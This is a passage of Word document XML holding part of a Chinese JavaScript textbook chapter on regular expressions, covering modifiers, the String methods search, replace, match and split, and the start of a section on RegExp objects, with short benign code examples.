              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="273" w:name="10_1_6_Xiu_Shi_Fu_"/>
      <w:r>
        <w:t>10.1.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　修饰符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="273"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正则表达式中的语法还有最后一个知识点，即正则表达式的修饰符，用以说明高级匹配模式的规则。和之前讨论的正则表达式语法不同，修饰符是放在</w:t>
      </w:r>
      <w:r>
        <w:t>“/”</w:t>
      </w:r>
      <w:r>
        <w:t>符号之外的，也就是说，它们不是出现在两条斜线之间，而是第二条斜线之后。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>支持三个修饰符，修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>"i"</w:t>
      </w:r>
      <w:r>
        <w:t>用以说明模式匹配是不区分大小写的。修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>"g"</w:t>
      </w:r>
      <w:r>
        <w:t>说明模式匹配应该是全局的，也就是说，应该找出被检索字符串中所有的匹配。修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>"m"</w:t>
      </w:r>
      <w:r>
        <w:t>用以在多行模式中执行匹配，在这种模式下，如果待检索的字符串包含多行，那么</w:t>
      </w:r>
      <w:r>
        <w:t>^</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>锚字符除了匹配整个字符串的开始和结尾之外，还能匹配</w:t>
      </w:r>
      <w:r>
        <w:t>每行的开始和结尾。比如正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>/java$/im</w:t>
      </w:r>
      <w:r>
        <w:t>可以匹配</w:t>
      </w:r>
      <w:r>
        <w:t>"java"</w:t>
      </w:r>
      <w:r>
        <w:t>也可以匹配</w:t>
      </w:r>
      <w:r>
        <w:t>"Java\nis fun"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这些修饰符可以任意组合，比如，要想不区分大小写匹配字符串中的第一个单词</w:t>
      </w:r>
      <w:r>
        <w:t>"java"</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>"Java"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"JAVA"</w:t>
      </w:r>
      <w:r>
        <w:t>等），可以使用不区分大小写的修饰符来定义正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>/\bjava\b/i</w:t>
      </w:r>
      <w:r>
        <w:t>。要想匹配字符串中所有的单词，则需要添加修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>/\bjava\b/gi</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:t>10-6</w:t>
      </w:r>
      <w:r>
        <w:t>对正则表达式的修饰符做了总结，注意，在本章的后续内容中还会介绍在</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>的方法中使用修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>的示例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4119113" cy="996350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="22" name="00022.jpeg" descr="00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00022.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4119113" cy="996350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="274" w:name="10_2_Yong_Yu_Mo_Shi_Pi_Pei_De_StringFang"/>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　用于模式匹配的</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="274"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>到目前为止，尽管本章已经讨论过创建正则表达式的语法，但还没有尝试过如何在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中使用这些正则表达式。本节将讨论</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一些用以执行正则表达式模式匹配和检索替换操作的方法，后续几节还会继续讨论如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>正则表达式的模式匹配，不过将侧重于</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象和它的方法及属性。注意，下面的讨论只是与正则表达式相关的方法和属性的概述。同样，可以在本书第三部分中查找到完整的介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>支持</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>种使用正则表达式的方法。最简单的是</w:t>
      </w:r>
      <w:r>
        <w:t>sea</w:t>
      </w:r>
      <w:r>
        <w:t>rch()</w:t>
      </w:r>
      <w:r>
        <w:t>。它的参数是一个正则表达式，返回第一个与之匹配的子串的起始位置，如果找不到匹配的子串，它将返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。比如，下面的调用返回值为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"JavaScript".search(/script/i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>search()</w:t>
      </w:r>
      <w:r>
        <w:t>的参数不是正则表达式，则首先会通过</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数将它转换成正则表达式，</w:t>
      </w:r>
      <w:r>
        <w:t>search()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不支持全局检索，因为它忽略正则表达式参数中的修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用以执行检索与替换操作。其中第一个参数是一个正则表达式，第二个参数是要进行替换的字符串。这个方法会对调用它的字</w:t>
      </w:r>
      <w:r>
        <w:t>符串进行检索，使用指定的模式来匹配。如果正则表达式中设置了修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>，那么源字符串中所有与模式匹配的子串都将替换成第二个参数指定的字符串；如果不带修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>，则只替换所匹配的第一个子串。如果</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个参数是字符串而不是正则表达式，则</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>将直接搜索这个字符串，而不是像</w:t>
      </w:r>
      <w:r>
        <w:t>search()</w:t>
      </w:r>
      <w:r>
        <w:t>一样首先通过</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>将它转换为正则表达式。比如，可以使用下面的方法，利用</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>将文本中的所有</w:t>
      </w:r>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:r>
        <w:t>（不区分大小写）统一替换为</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将所有不区分大小写的</w:t>
      </w:r>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:r>
        <w:t>都替换成大小写正确的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text.replace(/javascript/gi,"JavaScript");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>的功能远不止这些。回忆一下前文所提到的，正则表达式中使用圆括号括起来的子表达式是带有从左到右的索引编号的，而且正则表达式会记忆与每个子表达式匹配的文本。如果在替换字符串中出现了</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>加数字，那么</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>将用与指定的子表达式相匹配的文本来替换这两个字符。这是一个非常有用的特性。比如，可以用它将一个字符串中的英文引</w:t>
      </w:r>
      <w:r>
        <w:t>号替换为中文半角引号：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一段引用文本起始于引号，结束于引号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>中间的内容区域不能包含引号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var quote=/"([^"]*)"/g;//</w:t>
      </w:r>
      <w:r>
        <w:t>用中文半角引号替换英文引号，同时要保持引号之间的内容（存储在</w:t>
      </w:r>
      <w:r>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t>中）没有被修改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text.replace(quote,'“$1”');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>方法还有一些其他重要特性，这些特性将在本书第三部分关于</w:t>
      </w:r>
      <w:r>
        <w:t>String.replace()</w:t>
      </w:r>
      <w:r>
        <w:t>的主题页中进行介绍。最值得注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的第二个参数可以是函数，该函数能够动态地计算替换字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>mat</w:t>
      </w:r>
      <w:r>
        <w:t>ch()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是最常用的</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>正则表达式方法。它的唯一参数就是一个正则表达式（或通过</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数将其转换为正则</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>表达式），返回的是一个由匹配结果组成的数组。如果该正则表达式设置了修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>，则该方法返回的数组包含字符串中的所有匹配结果。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"1 plus 2 equals 3".match(/\d+/g)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>["1","2","3"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果这个正则表达式没有设置修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
      <w:r>
        <w:t>就不会进行全局检索，它只检索第一个匹配。但即使</w:t>
      </w:r>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
      <w:r>
        <w:t>执行的不是全局检索，它也返回一个数组。在这种情况下，数组的第一个元素就是匹配的字符串，余下的元素则是正则表达式中用圆括号括起来的子表达式。因此，如果</w:t>
      </w:r>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个数组</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:t>a[0]</w:t>
      </w:r>
      <w:r>
        <w:t>存放的是完整的匹配，</w:t>
      </w:r>
      <w:r>
        <w:t>a[1]</w:t>
      </w:r>
      <w:r>
        <w:t>存放的则是与第一个用圆括号括起来的表达式相匹配的子串，以此类推。为了和方法</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>保持一致，</w:t>
      </w:r>
      <w:r>
        <w:t>a[n]</w:t>
      </w:r>
      <w:r>
        <w:t>存放的是</w:t>
      </w:r>
      <w:r>
        <w:t>$n</w:t>
      </w:r>
      <w:r>
        <w:t>的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例如，使用如下的代码来解析一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var u</w:t>
      </w:r>
      <w:r>
        <w:t>rl=/(\w+):\/\/([\w.]+)\/(\S*)/;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text="Visit my blog at http://www.example.com/</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>david";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var result=text.match(url);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(result!=null){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var fullurl=result[0];//</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>"http://www.example.com/</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>david"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var protocol=result[1];//</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>"http"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var host=result[2];//</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>"www</w:t>
      </w:r>
      <w:r>
        <w:t>.example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var path=result[3];//</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>david"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值得注意的是，给字符串的</w:t>
      </w:r>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传入一个非全局的正则表达式，实际上和给这个正则表达式的</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>方法传入的字符串是一模一样的，它返回的数组带有两个属性：</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>，接下来对</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的讨论中会提到：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象的最后一个和正则表达式相关的方法是</w:t>
      </w:r>
      <w:r>
        <w:t>split()</w:t>
      </w:r>
      <w:r>
        <w:t>。这个方法用以将调用它的字符串拆分为一个子串组成的数组，使用的分隔符是</w:t>
      </w:r>
      <w:r>
        <w:t>split()</w:t>
      </w:r>
      <w:r>
        <w:t>的参数，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"123,456,</w:t>
      </w:r>
      <w:r>
        <w:t>789".split(",");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>["123","456","789"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>split()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的参数也可以是一个正则表达式，这使得</w:t>
      </w:r>
      <w:r>
        <w:t>split()</w:t>
      </w:r>
      <w:r>
        <w:t>方法异常强大。例如，可以指定分隔符，允许两边可以留有任意多的空白符：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"1,2,3,4,5".split(/\s*,\s*/);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>["1","2","3","4","5"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>split()</w:t>
      </w:r>
      <w:r>
        <w:t>方法还有其他一些特性，本书第三部分有关于</w:t>
      </w:r>
      <w:r>
        <w:t>String.split()</w:t>
      </w:r>
      <w:r>
        <w:t>更详尽的说明。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="275" w:name="10_3_RegExpDui_Xiang_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>10.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="275"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正如本章开始所讲到的，正则表达式是通过</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>象来表示的。除了</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数之外，</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象还支持三个方法和一些属性。接下来的两节会对</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>模式匹配方法和属性展开讲述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数带有两个字符串参数，其中第二个参数是可选的，</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>用以创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
